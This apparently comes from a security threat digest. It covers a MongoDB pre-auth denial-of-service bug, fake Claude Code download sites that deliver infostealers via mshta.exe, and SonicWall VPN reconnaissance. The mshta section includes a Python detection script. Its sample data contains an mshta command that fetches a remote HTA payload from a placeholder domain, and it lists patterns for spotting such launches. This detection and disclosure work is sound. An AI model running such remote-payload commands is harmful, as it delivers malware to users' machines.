Trending Topics
TRENDING TOPICS MAR 05, 2026

High-Severity MongoDB Compression Bug Enables Fast Pre-Auth DoS

Cato CTRL’s Vitaly Simonovich disclosed CVE-2026-25611, a high-severity (7.5) vulnerability affecting all MongoDB deployments with wire-protocol compression enabled, including MongoDB Atlas. By abusing the OP_COMPRESSED message flow, a threat actor can send small, crafted packets that cause MongoDB to allocate 48MB per connection before validation, rapidly exhausting RAM; as few as 3–10 connections can crash small instances, while even 64GB servers can be taken down with roughly a thousand concurrent connections. Although Atlas clusters are not internet-reachable by default and must be opened via IP allow lists, more than 207,000 MongoDB instances are exposed on the internet today, and those reachable from 0.0.0.0/0 are particularly at risk of unauthenticated denial-of-service attacks. Organizations should immediately upgrade to fixed releases (8.2.4 / 8.0.18 / 7.0.29 or later), restrict MongoDB exposure to trusted networks, enforce sensible connection limits, monitor for abnormal memory growth or OP_COMPRESSED traffic patterns, and consider disabling compression where it is not operationally necessary.

Fake “Claude Code” Download Sites Use mshta.exe to Deliver Lightweight Infostealers

Threat actors are exploiting interest in Anthropic’s Claude Code tools by standing up fake download portals that masquerade as official desktop installers and quietly deliver a script-based infostealer via mshta.exe. Attackers register or compromise domains that visually mimic legitimate Claude or “Claude Code” landing pages, then drive traffic through search poisoning, paid ads, and social media posts aimed at developers and power users looking for native clients. When a victim clicks the “Download” button, they receive a small script or shortcut file that hands execution to built-in Windows binaries instead of a legitimate installer, allowing the chain to blend in with normal user activity. At the core of this campaign is mshta.exe, Microsoft’s long-abused HTML Application Host, which can execute local or remote HTA content with the same trust as a native Windows component. After launch, the fake installer spawns mshta.exe with a remote URL parameter, instructing it to fetch and run an HTA payload that decodes and executes additional scripts or shell commands to harvest browser data, credentials, and system information, then exfiltrate it to attacker-controlled infrastructure. This operation underscores why “simple” LOLBins still matter: a single suspicious mshta.exe invocation, especially one spawned from an unusual parent (e.g., a newly downloaded shortcut) and reaching out to a newly observed domain, may be the only visible indicator of a multi-stage infostealer chain. Defenders should prioritize high-fidelity detections for remote HTA execution, anomalous parents of mshta.exe, and outbound connections to newly registered or untrusted domains associated with AI tools.
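The three detection signals called out above (remote HTA URL, anomalous parent, and a host to enrich against domain-age data) can be checked directly on process-creation telemetry. The following is an added example written for this digest, not code from the campaign report or any vendor; the event fields mirror Sysmon Event ID 1, the parent allow/deny sets are assumptions, and the sample events and domain are constructed.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str

# Assumption: script hosts and shells that commonly front a download-to-LOLBin chain.
SCRIPT_HOST_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Assumption: user-writable locations where a "fake installer" or shortcut would land.
USER_WRITABLE = re.compile(r"\\(downloads|temp|tmp|appdata)\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"\b(https?|ftp)://([^\s/\"']+)", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def assess_mshta(ev: ProcessEvent) -> dict:
    """Return findings for an mshta.exe launch; an empty list means nothing notable."""
    findings, host = [], None
    if basename(ev.image) != "mshta.exe":
        return {"findings": findings, "remote_host": host}
    m = REMOTE_URL.search(ev.command_line)
    if m:
        host = m.group(2).lower()            # hand this to domain-age / reputation enrichment
        findings.append("remote_hta_url")    # HTA fetched from the network, the core signal
    if INLINE_SCRIPT.search(ev.command_line):
        findings.append("inline_script_protocol")  # javascript:/vbscript: one-liner
    parent = basename(ev.parent_image)
    if parent in SCRIPT_HOST_PARENTS:
        findings.append(f"script_host_parent:{parent}")
    if USER_WRITABLE.search(ev.parent_image):
        findings.append(f"user_writable_parent:{parent}")
    return {"findings": findings, "remote_host": host}

# Constructed sample events (not real telemetry); the domain is a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcessEvent(r"C:\Users\dev\Downloads\ClaudeCode-Setup.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe https://claude-code-download.invalid/installer.hta"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta "vbscript:MsgBox(1)"'),
]

def triage(events):
    """Surface events with at least two independent findings as alerts."""
    return [(e.parent_image, assess_mshta(e)) for e in events
            if len(assess_mshta(e)["findings"]) >= 2]
```

The local HTA launched from explorer.exe produces no findings, while the two constructed chains each trigger two signals and are surfaced by `triage`.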

Update: Surge in SonicWall SSL VPN Reconnaissance

Between February 22–25, 2026, GreyNoise logged 84,142 scanning sessions against SonicWall SonicOS devices from 4,305 IPs across 20 autonomous systems, with 92% of traffic hitting a single SSL VPN status API and 32% routed through a rotating commercial proxy service, indicating coordinated, proxy-backed attack surface mapping rather than active CVE exploitation. This pattern, which mirrors prior multi-vendor VPN campaigns, is designed to quietly build an inventory of internet-exposed SonicWall SSL VPN instances before investing in credential attacks or vulnerability exploits. Because SonicWall SSL VPN remains a heavily abused initial access vector for ransomware groups such as Akira and Fog, this reconnaissance should be treated as an early-warning phase: once attackers pair these mapped targets with stolen or sprayed credentials and flaws like CVE-2024-53704, they have repeatedly demonstrated the ability to move from VPN login to full network encryption in under four hours. Organizations running SonicWall should prioritize patching against known KEV-listed vulnerabilities, enforcing MFA on all VPN accounts, and restricting management and API endpoints to trusted networks to reduce the likelihood that this mapping activity results in a successful compromise.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.